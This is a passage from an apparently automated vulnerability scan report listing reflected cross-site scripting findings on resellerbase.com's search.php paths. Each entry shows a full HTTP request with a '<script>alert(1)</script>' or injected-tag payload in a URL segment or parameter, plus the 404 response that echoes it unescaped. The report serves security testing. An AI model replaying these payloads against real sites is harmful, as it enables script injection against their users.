Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42193a4<script>alert(1)</script>bea865d50b0/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3056. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2eac6<script>alert(1)</script>e69c3985fdd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes2eac6<script>alert(1)</script>e69c3985fdd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes2eac6<script>alert(1)</script>e69c3985fdd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3057. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1e5a<script>alert(1)</script>7507935d8df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmose1e5a<script>alert(1)</script>7507935d8df/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmose1e5a<script>alert(1)</script>7507935d8df/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3058. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 65a52<script>alert(1)</script>9594b809717 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images65a52<script>alert(1)</script>9594b809717/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images65a52<script>alert(1)</script>9594b809717/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3059. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ef6ff<script>alert(1)</script>5671a85ec27 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/search.phpef6ff<script>alert(1)</script>5671a85ec27?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.phpef6ff<script>alert(1)</script>5671a85ec27?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3060. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 689f2<a>47c8e60410d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search689f2<a>47c8e60410d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search689f2<a>47c8e60410d&opt=2 was not found on this server.</p>
...[SNIP]...

2.3061. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload bbb7f<a>be6485715f6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...bbb7f<a>be6485715f6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...bbb7f<a>be6485715f6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3062. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3eaee<script>alert(1)</script>95da6a55448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&3eaee<script>alert(1)</script>95da6a55448=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&3eaee<script>alert(1)</script>95da6a55448=1 was not found on this server.</p>
...[SNIP]...

2.3063. http://www.resellerbase.com/detail/42/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a9180<a>0eae71e8750 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a9180<a>0eae71e8750 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2a9180<a>0eae71e8750 was not found on this server.</p>
...[SNIP]...

2.3064. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f3d8<script>alert(1)</script>f3027c7dc59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4f3d8<script>alert(1)</script>f3027c7dc59/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4f3d8<script>alert(1)</script>f3027c7dc59/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3065. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9a7fc<script>alert(1)</script>b69c293f883 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/429a7fc<script>alert(1)</script>b69c293f883/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/429a7fc<script>alert(1)</script>b69c293f883/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3066. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f169a<script>alert(1)</script>1bb6dd4ee99 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themesf169a<script>alert(1)</script>1bb6dd4ee99/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themesf169a<script>alert(1)</script>1bb6dd4ee99/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3067. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b788a<script>alert(1)</script>5998369b556 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmosb788a<script>alert(1)</script>5998369b556/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmosb788a<script>alert(1)</script>5998369b556/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3068. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1a4a7<script>alert(1)</script>26224587252 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/search.php1a4a7<script>alert(1)</script>26224587252?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php1a4a7<script>alert(1)</script>26224587252?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3069. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1e795<a>53bf2c703e4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search1e795<a>53bf2c703e4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search1e795<a>53bf2c703e4&opt=2 was not found on this server.</p>
...[SNIP]...

2.3070. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f0dc8<a>38b01ca5f83 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...f0dc8<a>38b01ca5f83&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...f0dc8<a>38b01ca5f83&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3071. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ea36<script>alert(1)</script>db6244ad522 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4ea36<script>alert(1)</script>db6244ad522=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&4ea36<script>alert(1)</script>db6244ad522=1 was not found on this server.</p>
...[SNIP]...

2.3072. http://www.resellerbase.com/detail/42/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e7126<a>fda633da431 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e7126<a>fda633da431 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e7126<a>fda633da431 was not found on this server.</p>
...[SNIP]...

2.3073. http://www.resellerbase.com/detail/42/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/42/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e3ec<script>alert(1)</script>3be950208a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1e3ec<script>alert(1)</script>3be950208a8/42/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/themes/
